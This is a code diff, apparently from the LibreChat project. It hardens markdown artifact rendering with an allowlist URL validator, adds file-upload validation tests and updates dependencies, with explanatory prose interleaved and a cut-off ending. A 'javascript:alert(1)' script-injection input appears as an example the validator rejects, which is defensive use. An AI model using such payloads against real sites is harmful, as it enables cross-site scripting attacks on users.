+      expect(rendererCode).toContain("import ReactMarkdown from 'react-markdown'");
+      expect(rendererCode).toContain("import remarkBreaks from 'remark-breaks'");
+      expect(rendererCode).toContain('skipHtml={true}');
+      expect(rendererCode).toContain('SAFE_PROTOCOLS');
+      expect(rendererCode).toContain('isSafeUrl');
+      expect(rendererCode).toContain('urlTransform={urlTransform}');
+      expect(rendererCode).toContain('remarkPlugins={remarkPlugins}');
+      expect(rendererCode).toContain('isSafeUrl(url) ? url : null');
+    });
+
+    it('should embed isSafeUrl logic matching the exported version', () => {
+      const files = getMarkdownFiles('# Test');
+      const rendererCode = files['/components/ui/MarkdownRenderer.tsx'];
+      expect(rendererCode).toContain("new Set(['http:', 'https:', 'mailto:', 'tel:'])");
+      expect(rendererCode).toContain('new URL(trimmed).protocol');
+      expect(rendererCode).toContain("trimmed.startsWith('/')");
+      expect(rendererCode).toContain("trimmed.startsWith('#')");
+      expect(rendererCode).toContain("trimmed.startsWith('.')");
     });

     it('should pass markdown content to the Markdown component', () => {

@@ -0,0 +1,172 @@
import { megabyte, fileConfig as defaultFileConfig } from 'librechat-data-provider';
import type { EndpointFileConfig, FileConfig } from 'librechat-data-provider';
import type { ExtendedFile } from '~/common';
import { validateFiles } from '../files';
const supportedMimeTypes = defaultFileConfig.endpoints.default.supportedMimeTypes;
function makeEndpointConfig(overrides: Partial<EndpointFileConfig> = {}): EndpointFileConfig {
return {
fileLimit: 10,
fileSizeLimit: 25 * megabyte,
totalSizeLimit: 100 * megabyte,
supportedMimeTypes,
disabled: false,
...overrides,
};
}
function makeFile(name: string, type: string, size: number): File {
const content = new ArrayBuffer(size);
return new File([content], name, { type });
}
function makeExtendedFile(overrides: Partial<ExtendedFile> = {}): ExtendedFile {
return {
file_id: 'ext-1',
size: 1024,
progress: 1,
type: 'application/pdf',
...overrides,
};
}
describe('validateFiles', () => {
let setError: jest.Mock;
let files: Map<string, ExtendedFile>;
let endpointFileConfig: EndpointFileConfig;
const fileConfig: FileConfig | null = null;
beforeEach(() => {
setError = jest.fn();
files = new Map();
endpointFileConfig = makeEndpointConfig();
});
it('returns true when all checks pass', () => {
const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(true);
expect(setError).not.toHaveBeenCalled();
});
it('rejects when endpoint is disabled', () => {
endpointFileConfig = makeEndpointConfig({ disabled: true });
const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith('com_ui_attach_error_disabled');
});
it('rejects empty files (zero bytes)', () => {
const fileList = [makeFile('empty.pdf', 'application/pdf', 0)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith('com_error_files_empty');
});
it('rejects when fileLimit would be exceeded', () => {
endpointFileConfig = makeEndpointConfig({ fileLimit: 3 });
files = new Map([
['f1', makeExtendedFile({ file_id: 'f1', filename: 'one.pdf', size: 2048 })],
['f2', makeExtendedFile({ file_id: 'f2', filename: 'two.pdf', size: 3072 })],
]);
const fileList = [
makeFile('a.pdf', 'application/pdf', 1024),
makeFile('b.pdf', 'application/pdf', 2048),
];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith('File limit reached: 3 files');
});
it('allows upload when exactly at fileLimit boundary', () => {
endpointFileConfig = makeEndpointConfig({ fileLimit: 3 });
files = new Map([
['f1', makeExtendedFile({ file_id: 'f1', filename: 'one.pdf', size: 2048 })],
['f2', makeExtendedFile({ file_id: 'f2', filename: 'two.pdf', size: 3072 })],
]);
const fileList = [makeFile('a.pdf', 'application/pdf', 1024)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(true);
});
it('rejects unsupported MIME type', () => {
const fileList = [makeFile('data.xyz', 'application/x-unknown', 1024)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith('Unsupported file type: application/x-unknown');
});
it('rejects when file size equals fileSizeLimit (>= comparison)', () => {
const limit = 5 * megabyte;
endpointFileConfig = makeEndpointConfig({ fileSizeLimit: limit });
const fileList = [makeFile('exact.pdf', 'application/pdf', limit)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith(`File size limit exceeded: ${limit / megabyte} MB`);
});
it('allows file just under fileSizeLimit', () => {
const limit = 5 * megabyte;
endpointFileConfig = makeEndpointConfig({ fileSizeLimit: limit });
const fileList = [makeFile('under.pdf', 'application/pdf', limit - 1)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(true);
});
it('rejects when totalSizeLimit would be exceeded', () => {
const limit = 10 * megabyte;
endpointFileConfig = makeEndpointConfig({ totalSizeLimit: limit });
files = new Map([['f1', makeExtendedFile({ file_id: 'f1', size: 6 * megabyte })]]);
const fileList = [makeFile('big.pdf', 'application/pdf', 5 * megabyte)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith(`Total file size limit exceeded: ${limit / megabyte} MB`);
});
it('allows when totalSizeLimit is exactly met', () => {
const limit = 10 * megabyte;
endpointFileConfig = makeEndpointConfig({ totalSizeLimit: limit });
files = new Map([['f1', makeExtendedFile({ file_id: 'f1', size: 5 * megabyte })]]);
const fileList = [makeFile('fits.pdf', 'application/pdf', 5 * megabyte)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(true);
});
it('rejects duplicate files', () => {
files = new Map([
[
'f1',
makeExtendedFile({
file_id: 'f1',
file: makeFile('doc.pdf', 'application/pdf', 1024),
filename: 'doc.pdf',
size: 1024,
type: 'application/pdf',
}),
],
]);
const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith('com_error_files_dupe');
});
it('enforces check ordering: disabled before fileLimit', () => {
endpointFileConfig = makeEndpointConfig({ disabled: true, fileLimit: 1 });
files = new Map([['f1', makeExtendedFile({ file_id: 'f1', filename: 'existing.pdf' })]]);
const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)];
validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(setError).toHaveBeenCalledWith('com_ui_attach_error_disabled');
});
it('enforces check ordering: fileLimit before fileSizeLimit', () => {
const limit = 1;
endpointFileConfig = makeEndpointConfig({ fileLimit: 1, fileSizeLimit: limit });
files = new Map([['f1', makeExtendedFile({ file_id: 'f1', filename: 'existing.pdf' })]]);
const fileList = [makeFile('huge.pdf', 'application/pdf', limit)];
validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(setError).toHaveBeenCalledWith('File limit reached: 1 files');
});
});


@@ -108,7 +108,9 @@ const mermaidDependencies = {
 };

 const markdownDependencies = {
-  'marked-react': '^2.0.0',
+  'remark-gfm': '^4.0.0',
+  'remark-breaks': '^4.0.0',
+  'react-markdown': '^9.0.1',
 };

 const dependenciesMap: Record<

@@ -251,7 +251,7 @@ export const validateFiles = ({
   const currentTotalSize = existingFiles.reduce((total, file) => total + file.size, 0);

   if (fileLimit && fileList.length + files.size > fileLimit) {
-    setError(`You can only upload up to ${fileLimit} files at a time.`);
+    setError(`File limit reached: ${fileLimit} files`);
     return false;
   }
@@ -282,19 +282,18 @@
     }

     if (!checkType(originalFile.type, mimeTypesToCheck)) {
-      console.log(originalFile);
-      setError('Currently, unsupported file type: ' + originalFile.type);
+      setError(`Unsupported file type: ${originalFile.type}`);
       return false;
     }

     if (fileSizeLimit && originalFile.size >= fileSizeLimit) {
-      setError(`File size exceeds ${fileSizeLimit / megabyte} MB.`);
+      setError(`File size limit exceeded: ${fileSizeLimit / megabyte} MB`);
       return false;
     }
   }

   if (totalSizeLimit && currentTotalSize + incomingTotalSize > totalSizeLimit) {
-    setError(`The total size of the files cannot exceed ${totalSizeLimit / megabyte} MB.`);
+    setError(`Total file size limit exceeded: ${totalSizeLimit / megabyte} MB`);
     return false;
   }
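The hunk above keeps the existing comparison semantics while tightening the messages: the per-file check rejects with `>=` (a file exactly at the limit fails), while the aggregate check rejects with `>` (exactly meeting the total passes, as the boundary tests in the new spec file assert). A minimal standalone sketch of just those two checks, for illustration only (`checkSizes` is a hypothetical helper, not part of the codebase; `megabyte` mirrors the constant from `librechat-data-provider`):

```typescript
const megabyte = 1024 * 1024;

interface SizeLimits {
  fileSizeLimit?: number;  // per-file cap; `>=` means an exact match is rejected
  totalSizeLimit?: number; // aggregate cap; `>` means an exact match is allowed
}

// Returns the error message that would be passed to setError, or null if OK.
function checkSizes(
  existingTotal: number,
  incomingSizes: number[],
  { fileSizeLimit, totalSizeLimit }: SizeLimits,
): string | null {
  for (const size of incomingSizes) {
    if (fileSizeLimit && size >= fileSizeLimit) {
      return `File size limit exceeded: ${fileSizeLimit / megabyte} MB`;
    }
  }
  const incomingTotal = incomingSizes.reduce((a, b) => a + b, 0);
  if (totalSizeLimit && existingTotal + incomingTotal > totalSizeLimit) {
    return `Total file size limit exceeded: ${totalSizeLimit / megabyte} MB`;
  }
  return null;
}
```

The asymmetry (`>=` vs `>`) matches the "exactly at fileSizeLimit is rejected" and "totalSizeLimit exactly met is allowed" cases exercised by the new `validateFiles` tests.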


@@ -1,12 +1,53 @@
 import dedent from 'dedent';

-const markdownRenderer = dedent(`import React, { useEffect, useState } from 'react';
-import Markdown from 'marked-react';
+const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:', 'tel:']);
+
+/**
+ * Allowlist-based URL validator for markdown artifact rendering.
+ * Mirrored verbatim in the markdownRenderer template string below;
+ * any logic change MUST be applied to both copies.
+ */
+export const isSafeUrl = (url: string): boolean => {
+  const trimmed = url.trim();
+  if (!trimmed) {
+    return false;
+  }
+  if (trimmed.startsWith('/') || trimmed.startsWith('#') || trimmed.startsWith('.')) {
+    return true;
+  }
+  try {
+    return SAFE_PROTOCOLS.has(new URL(trimmed).protocol);
+  } catch {
+    return false;
+  }
+};
+
+const markdownRenderer = dedent(`import React from 'react';
+import remarkGfm from 'remark-gfm';
+import remarkBreaks from 'remark-breaks';
+import ReactMarkdown from 'react-markdown';

 interface MarkdownRendererProps {
   content: string;
 }

+/** Mirror of the exported isSafeUrl in markdown.ts — keep in sync. */
+const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:', 'tel:']);
+
+const isSafeUrl = (url: string): boolean => {
+  const trimmed = url.trim();
+  if (!trimmed) return false;
+  if (trimmed.startsWith('/') || trimmed.startsWith('#') || trimmed.startsWith('.')) return true;
+  try {
+    return SAFE_PROTOCOLS.has(new URL(trimmed).protocol);
+  } catch {
+    return false;
+  }
+};
+
+const remarkPlugins = [remarkGfm, remarkBreaks];
+const urlTransform = (url: string) => (isSafeUrl(url) ? url : null);

 const MarkdownRenderer: React.FC<MarkdownRendererProps> = ({ content }) => {
   return (
     <div
@@ -17,7 +58,13 @@ const MarkdownRenderer: React.FC<MarkdownRendererProps> = ({ content }) => {
         minHeight: '100vh'
       }}
     >
-      <Markdown gfm={true} breaks={true}>{content}</Markdown>
+      <ReactMarkdown
+        remarkPlugins={remarkPlugins}
+        skipHtml={true}
+        urlTransform={urlTransform}
+      >
+        {content}
+      </ReactMarkdown>
     </div>
   );
 };
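The validator above fails closed: anything that is neither protocol-relative-safe (a path or anchor) nor carries an allowlisted scheme returns `false`, including bare hostnames that `new URL` cannot parse. A standalone copy, runnable on Node 18+ (which provides the WHATWG `URL` global); the logic is copied verbatim from the diff, and only the example calls are mine:

```typescript
const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:', 'tel:']);

const isSafeUrl = (url: string): boolean => {
  const trimmed = url.trim();
  if (!trimmed) {
    return false;
  }
  // Relative paths and in-page anchors carry no scheme and are always safe
  if (trimmed.startsWith('/') || trimmed.startsWith('#') || trimmed.startsWith('.')) {
    return true;
  }
  try {
    // URL parsing lower-cases the scheme, so 'JavaScript:alert(1)' is caught too
    return SAFE_PROTOCOLS.has(new URL(trimmed).protocol);
  } catch {
    // Unparseable (e.g. a bare 'example.com') fails closed
    return false;
  }
};

console.log(isSafeUrl('https://example.com')); // true
console.log(isSafeUrl(' javascript:alert(1)')); // false
console.log(isSafeUrl('#section')); // true
```

Note the `trim()` before all checks, which is what defeats the leading-whitespace bypass covered by the `' javascript:alert(1)'` test case.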

package-lock.json (generated)

@@ -59,13 +59,14 @@
     "@google/genai": "^1.19.0",
     "@keyv/redis": "^4.3.3",
     "@langchain/core": "^0.3.80",
-    "@librechat/agents": "^3.1.55",
+    "@librechat/agents": "^3.1.56",
     "@librechat/api": "*",
     "@librechat/data-schemas": "*",
     "@microsoft/microsoft-graph-client": "^3.0.7",
     "@modelcontextprotocol/sdk": "^1.27.1",
     "@node-saml/passport-saml": "^5.1.0",
     "@smithy/node-http-handler": "^4.4.5",
+    "ai-tokenizer": "^1.0.6",
     "axios": "^1.13.5",
     "bcryptjs": "^2.4.3",
     "compression": "^1.8.1",
@@ -81,7 +82,7 @@
     "express-rate-limit": "^8.3.0",
     "express-session": "^1.18.2",
     "express-static-gzip": "^2.2.0",
-    "file-type": "^18.7.0",
+    "file-type": "^21.3.2",
     "firebase": "^11.0.2",
     "form-data": "^4.0.4",
     "handlebars": "^4.7.7",
@@ -121,10 +122,9 @@
     "pdfjs-dist": "^5.4.624",
     "rate-limit-redis": "^4.2.0",
     "sharp": "^0.33.5",
-    "tiktoken": "^1.0.15",
     "traverse": "^0.6.7",
     "ua-parser-js": "^1.0.36",
-    "undici": "^7.18.2",
+    "undici": "^7.24.1",
     "winston": "^3.11.0",
     "winston-daily-rotate-file": "^5.0.0",
     "xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz",
@@ -270,6 +270,24 @@
         "node": ">= 0.8.0"
       }
     },
+    "api/node_modules/file-type": {
+      "version": "21.3.2",
+      "resolved": "https://registry.npmjs.org/file-type/-/file-type-21.3.2.tgz",
+      "integrity": "sha512-DLkUvGwep3poOV2wpzbHCOnSKGk1LzyXTv+aHFgN2VFl96wnp8YA9YjO2qPzg5PuL8q/SW9Pdi6WTkYOIh995w==",
+      "license": "MIT",
+      "dependencies": {
+        "@tokenizer/inflate": "^0.4.1",
+        "strtok3": "^10.3.4",
+        "token-types": "^6.1.1",
+        "uint8array-extras": "^1.4.0"
+      },
+      "engines": {
+        "node": ">=20"
+      },
+      "funding": {
+        "url": "https://github.com/sindresorhus/file-type?sponsor=1"
+      }
+    },
     "api/node_modules/jose": {
       "version": "6.1.3",
       "resolved": "https://registry.npmjs.org/jose/-/jose-6.1.3.tgz",
@@ -348,6 +366,40 @@
         "@img/sharp-win32-x64": "0.33.5"
       }
     },
+    "api/node_modules/strtok3": {
+      "version": "10.3.4",
+      "resolved": "https://registry.npmjs.org/strtok3/-/strtok3-10.3.4.tgz",
+      "integrity": "sha512-KIy5nylvC5le1OdaaoCJ07L+8iQzJHGH6pWDuzS+d07Cu7n1MZ2x26P8ZKIWfbK02+XIL8Mp4RkWeqdUCrDMfg==",
+      "license": "MIT",
+      "dependencies": {
+        "@tokenizer/token": "^0.3.0"
+      },
+      "engines": {
+        "node": ">=18"
+      },
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/Borewit"
+      }
+    },
+    "api/node_modules/token-types": {
+      "version": "6.1.2",
+      "resolved": "https://registry.npmjs.org/token-types/-/token-types-6.1.2.tgz",
+      "integrity": "sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==",
+      "license": "MIT",
+      "dependencies": {
+        "@borewit/text-codec": "^0.2.1",
+        "@tokenizer/token": "^0.3.0",
+        "ieee754": "^1.2.1"
+      },
+      "engines": {
+        "node": ">=14.16"
+      },
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/Borewit"
+      }
+    },
     "api/node_modules/winston-daily-rotate-file": {
       "version": "5.0.0",
       "resolved": "https://registry.npmjs.org/winston-daily-rotate-file/-/winston-daily-rotate-file-5.0.0.tgz",
@@ -7286,6 +7338,16 @@
       "dev": true,
       "license": "MIT"
     },
+    "node_modules/@borewit/text-codec": {
+      "version": "0.2.2",
+      "resolved": "https://registry.npmjs.org/@borewit/text-codec/-/text-codec-0.2.2.tgz",
+      "integrity": "sha512-DDaRehssg1aNrH4+2hnj1B7vnUGEjU6OIlyRdkMd0aUdIUvKXrJfXsy8LVtXAy7DRvYVluWbMspsRhz2lcW0mQ==",
+      "license": "MIT",
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/Borewit"
+      }
+    },
     "node_modules/@braintree/sanitize-url": {
       "version": "7.1.1",
       "resolved": "https://registry.npmjs.org/@braintree/sanitize-url/-/sanitize-url-7.1.1.tgz",
@@ -12262,9 +12324,9 @@
       }
     },
     "node_modules/@librechat/agents": {
-      "version": "3.1.55",
-      "resolved": "https://registry.npmjs.org/@librechat/agents/-/agents-3.1.55.tgz",
-      "integrity": "sha512-impxeKpCDlPkAVQFWnA6u6xkxDSBR/+H8uYq7rZomBeu0rUh/OhJLiI1fAwPhKXP33udNtHA8GyDi0QJj78R9w==",
+      "version": "3.1.56",
+      "resolved": "https://registry.npmjs.org/@librechat/agents/-/agents-3.1.56.tgz",
+      "integrity": "sha512-HJJwRnLM4XKpTWB4/wPDJR+iegyKBVUwqj7A8QHqzEcHzjKJDTr3wBPxZVH1tagGr6/mbbnErOJ14cH1OSNmpA==",
       "license": "MIT",
       "dependencies": {
         "@anthropic-ai/sdk": "^0.73.0",
@@ -12285,6 +12347,7 @@
         "@langfuse/tracing": "^4.3.0",
         "@opentelemetry/sdk-node": "^0.207.0",
         "@scarf/scarf": "^1.4.0",
+        "ai-tokenizer": "^1.0.6",
         "axios": "^1.13.5",
         "cheerio": "^1.0.0",
         "dotenv": "^16.4.7",
@@ -20799,6 +20862,41 @@
         "@testing-library/dom": ">=7.21.4"
       }
     },
+    "node_modules/@tokenizer/inflate": {
+      "version": "0.4.1",
+      "resolved": "https://registry.npmjs.org/@tokenizer/inflate/-/inflate-0.4.1.tgz",
+      "integrity": "sha512-2mAv+8pkG6GIZiF1kNg1jAjh27IDxEPKwdGul3snfztFerfPGI1LjDezZp3i7BElXompqEtPmoPx6c2wgtWsOA==",
+      "license": "MIT",
+      "dependencies": {
+        "debug": "^4.4.3",
+        "token-types": "^6.1.1"
+      },
+      "engines": {
+        "node": ">=18"
+      },
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/Borewit"
+      }
+    },
+    "node_modules/@tokenizer/inflate/node_modules/token-types": {
+      "version": "6.1.2",
+      "resolved": "https://registry.npmjs.org/token-types/-/token-types-6.1.2.tgz",
+      "integrity": "sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==",
+      "license": "MIT",
+      "dependencies": {
+        "@borewit/text-codec": "^0.2.1",
+        "@tokenizer/token": "^0.3.0",
+        "ieee754": "^1.2.1"
+      },
+      "engines": {
+        "node": ">=14.16"
+      },
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/Borewit"
+      }
+    },
     "node_modules/@tokenizer/token": {
       "version": "0.3.0",
       "resolved": "https://registry.npmjs.org/@tokenizer/token/-/token-0.3.0.tgz",
@@ -22230,6 +22328,20 @@
         "node": ">= 14"
       }
     },
+    "node_modules/ai-tokenizer": {
+      "version": "1.0.6",
+      "resolved": "https://registry.npmjs.org/ai-tokenizer/-/ai-tokenizer-1.0.6.tgz",
+      "integrity": "sha512-GaakQFxen0pRH/HIA4v68ZM40llCH27HUYUSBLK+gVuZ57e53pYJe1xFvSTj4sJJjbWU92m1X6NjPWyeWkFDow==",
+      "license": "MIT",
+      "peerDependencies": {
+        "ai": "^5.0.0"
+      },
+      "peerDependenciesMeta": {
+        "ai": {
+          "optional": true
+        }
+      }
+    },
     "node_modules/ajv": {
       "version": "8.18.0",
       "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.18.0.tgz",
@@ -27499,22 +27611,6 @@
         "moment": "^2.29.1"
       }
     },
-    "node_modules/file-type": {
-      "version": "18.7.0",
-      "resolved": "https://registry.npmjs.org/file-type/-/file-type-18.7.0.tgz",
-      "integrity": "sha512-ihHtXRzXEziMrQ56VSgU7wkxh55iNchFkosu7Y9/S+tXHdKyrGjVK0ujbqNnsxzea+78MaLhN6PGmfYSAv1ACw==",
-      "dependencies": {
-        "readable-web-to-node-stream": "^3.0.2",
-        "strtok3": "^7.0.0",
-        "token-types": "^5.0.1"
-      },
-      "engines": {
-        "node": ">=14.16"
-      },
-      "funding": {
-        "url": "https://github.com/sindresorhus/file-type?sponsor=1"
-      }
-    },
     "node_modules/filelist": {
       "version": "1.0.6",
       "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.6.tgz",
@@ -28803,9 +28899,9 @@
       "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ=="
     },
     "node_modules/hono": {
-      "version": "4.12.5",
-      "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.5.tgz",
-      "integrity": "sha512-3qq+FUBtlTHhtYxbxheZgY8NIFnkkC/MR8u5TTsr7YZ3wixryQ3cCwn3iZbg8p8B88iDBBAYSfZDS75t8MN7Vg==",
+      "version": "4.12.7",
+      "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.7.tgz",
+      "integrity": "sha512-jq9l1DM0zVIvsm3lv9Nw9nlJnMNPOcAtsbsgiUhWcFzPE99Gvo6yRTlszSLLYacMeQ6quHD6hMfId8crVHvexw==",
       "license": "MIT",
       "engines": {
         "node": ">=16.9.0"
@@ -35688,18 +35784,6 @@
         "node-readable-to-web-readable-stream": "^0.4.2"
       }
     },
-    "node_modules/peek-readable": {
-      "version": "5.0.0",
-      "resolved": "https://registry.npmjs.org/peek-readable/-/peek-readable-5.0.0.tgz",
-      "integrity": "sha512-YtCKvLUOvwtMGmrniQPdO7MwPjgkFBtFIrmfSbYmYuq3tKDV/mcfAhBth1+C3ru7uXIZasc/pHnb+YDYNkkj4A==",
-      "engines": {
-        "node": ">=14.16"
-      },
-      "funding": {
-        "type": "github",
-        "url": "https://github.com/sponsors/Borewit"
-      }
-    },
     "node_modules/pend": {
       "version": "1.2.0",
       "resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz",
@@ -38505,21 +38589,6 @@
         "node": ">= 6"
       }
     },
-    "node_modules/readable-web-to-node-stream": {
-      "version": "3.0.2",
-      "resolved": "https://registry.npmjs.org/readable-web-to-node-stream/-/readable-web-to-node-stream-3.0.2.tgz",
-      "integrity": "sha512-ePeK6cc1EcKLEhJFt/AebMCLL+GgSKhuygrZ/GLaKZYEecIgIECf4UaUuaByiGtzckwR4ain9VzUh95T1exYGw==",
-      "dependencies": {
-        "readable-stream": "^3.6.0"
-      },
-      "engines": {
-        "node": ">=8"
-      },
-      "funding": {
-        "type": "github",
-        "url": "https://github.com/sponsors/Borewit"
-      }
-    },
     "node_modules/readdirp": {
       "version": "3.6.0",
       "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz",
@@ -40906,22 +40975,6 @@
       ],
       "license": "MIT"
     },
-    "node_modules/strtok3": {
-      "version": "7.0.0",
-      "resolved": "https://registry.npmjs.org/strtok3/-/strtok3-7.0.0.tgz",
-      "integrity": "sha512-pQ+V+nYQdC5H3Q7qBZAz/MO6lwGhoC2gOAjuouGf/VO0m7vQRh8QNMl2Uf6SwAtzZ9bOw3UIeBukEGNJl5dtXQ==",
-      "dependencies": {
-        "@tokenizer/token": "^0.3.0",
-        "peek-readable": "^5.0.0"
-      },
-      "engines": {
-        "node": ">=14.16"
-      },
-      "funding": {
-        "type": "github",
-        "url": "https://github.com/sponsors/Borewit"
-      }
-    },
     "node_modules/style-inject": {
       "version": "0.3.0",
       "resolved": "https://registry.npmjs.org/style-inject/-/style-inject-0.3.0.tgz",
@@ -41485,11 +41538,6 @@
         "node": ">=0.8"
       }
     },
-    "node_modules/tiktoken": {
-      "version": "1.0.15",
-      "resolved": "https://registry.npmjs.org/tiktoken/-/tiktoken-1.0.15.tgz",
-      "integrity": "sha512-sCsrq/vMWUSEW29CJLNmPvWxlVp7yh2tlkAjpJltIKqp5CKf98ZNpdeHRmAlPVFlGEbswDc6SmI8vz64W/qErw=="
-    },
     "node_modules/timers-browserify": {
       "version": "2.0.12",
       "resolved": "https://registry.npmjs.org/timers-browserify/-/timers-browserify-2.0.12.tgz",
@@ -41631,22 +41679,6 @@
         "node": ">=0.6"
       }
     },
-    "node_modules/token-types": {
-      "version": "5.0.1",
-      "resolved": "https://registry.npmjs.org/token-types/-/token-types-5.0.1.tgz",
-      "integrity": "sha512-Y2fmSnZjQdDb9W4w4r1tswlMHylzWIeOKpx0aZH9BgGtACHhrk3OkT52AzwcuqTRBZtvvnTjDBh8eynMulu8Vg==",
-      "dependencies": {
-        "@tokenizer/token": "^0.3.0",
-        "ieee754": "^1.2.1"
-      },
-      "engines": {
-        "node": ">=14.16"
-      },
-      "funding": {
-        "type": "github",
-        "url": "https://github.com/sponsors/Borewit"
-      }
-    },
     "node_modules/touch": {
       "version": "3.1.0",
       "resolved": "https://registry.npmjs.org/touch/-/touch-3.1.0.tgz",
@@ -42197,6 +42229,18 @@
       "resolved": "https://registry.npmjs.org/uid2/-/uid2-0.0.4.tgz",
       "integrity": "sha512-IevTus0SbGwQzYh3+fRsAMTVVPOoIVufzacXcHPmdlle1jUpq7BRL+mw3dgeLanvGZdwwbWhRV6XrcFNdBmjWA=="
     },
+    "node_modules/uint8array-extras": {
+      "version": "1.5.0",
+      "resolved": "https://registry.npmjs.org/uint8array-extras/-/uint8array-extras-1.5.0.tgz",
+      "integrity": "sha512-rvKSBiC5zqCCiDZ9kAOszZcDvdAHwwIKJG33Ykj43OKcWsnmcBRL09YTU4nOeHZ8Y2a7l1MgTd08SBe9A8Qj6A==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=18"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/sindresorhus"
+      }
+    },
     "node_modules/unbox-primitive": {
       "version": "1.1.0",
       "resolved": "https://registry.npmjs.org/unbox-primitive/-/unbox-primitive-1.1.0.tgz",
@ -42229,9 +42273,9 @@
"license": "MIT" "license": "MIT"
}, },
"node_modules/undici": { "node_modules/undici": {
"version": "7.20.0", "version": "7.24.1",
"resolved": "https://registry.npmjs.org/undici/-/undici-7.20.0.tgz", "resolved": "https://registry.npmjs.org/undici/-/undici-7.24.1.tgz",
"integrity": "sha512-MJZrkjyd7DeC+uPZh+5/YaMDxFiiEEaDgbUSVMXayofAkDWF1088CDo+2RPg7B1BuS1qf1vgNE7xqwPxE0DuSQ==", "integrity": "sha512-5xoBibbmnjlcR3jdqtY2Lnx7WbrD/tHlT01TmvqZUFVc9Q1w4+j5hbnapTqbcXITMH1ovjq/W7BkqBilHiVAaA==",
"license": "MIT", "license": "MIT",
"engines": { "engines": {
"node": ">=20.18.1" "node": ">=20.18.1"
@@ -44088,9 +44132,9 @@
}
},
"node_modules/yauzl": {
-"version": "3.2.0",
-"resolved": "https://registry.npmjs.org/yauzl/-/yauzl-3.2.0.tgz",
-"integrity": "sha512-Ow9nuGZE+qp1u4JIPvg+uCiUr7xGQWdff7JQSk5VGYTAZMDe2q8lxJ10ygv10qmSj031Ty/6FNJpLO4o1Sgc+w==",
+"version": "3.2.1",
+"resolved": "https://registry.npmjs.org/yauzl/-/yauzl-3.2.1.tgz",
+"integrity": "sha512-k1isifdbpNSFEHFJ1ZY4YDewv0IH9FR61lDetaRMD3j2ae3bIXGV+7c+LHCqtQGofSd8PIyV4X6+dHMAnSr60A==",
"dev": true,
"license": "MIT",
"dependencies": {
@@ -44196,10 +44240,11 @@
"@google/genai": "^1.19.0",
"@keyv/redis": "^4.3.3",
"@langchain/core": "^0.3.80",
-"@librechat/agents": "^3.1.55",
+"@librechat/agents": "^3.1.56",
"@librechat/data-schemas": "*",
"@modelcontextprotocol/sdk": "^1.27.1",
"@smithy/node-http-handler": "^4.4.5",
+"ai-tokenizer": "^1.0.6",
"axios": "^1.13.5",
"connect-redis": "^8.1.0",
"eventsource": "^3.0.2",
@@ -44222,8 +44267,7 @@
"node-fetch": "2.7.0",
"pdfjs-dist": "^5.4.624",
"rate-limit-redis": "^4.2.0",
-"tiktoken": "^1.0.15",
-"undici": "^7.18.2",
+"undici": "^7.24.1",
"zod": "^3.22.4"
}
},


@@ -7,6 +7,7 @@ export default {
'\\.dev\\.ts$',
'\\.helper\\.ts$',
'\\.helper\\.d\\.ts$',
+'/__tests__/helpers/',
],
coverageReporters: ['text', 'cobertura'],
testResultsProcessor: 'jest-junit',


@@ -18,8 +18,8 @@
"build:dev": "npm run clean && NODE_ENV=development rollup -c --bundleConfigAsCjs",
"build:watch": "NODE_ENV=development rollup -c -w --bundleConfigAsCjs",
"build:watch:prod": "rollup -c -w --bundleConfigAsCjs",
-"test": "jest --coverage --watch --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.\"",
-"test:ci": "jest --coverage --ci --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.\"",
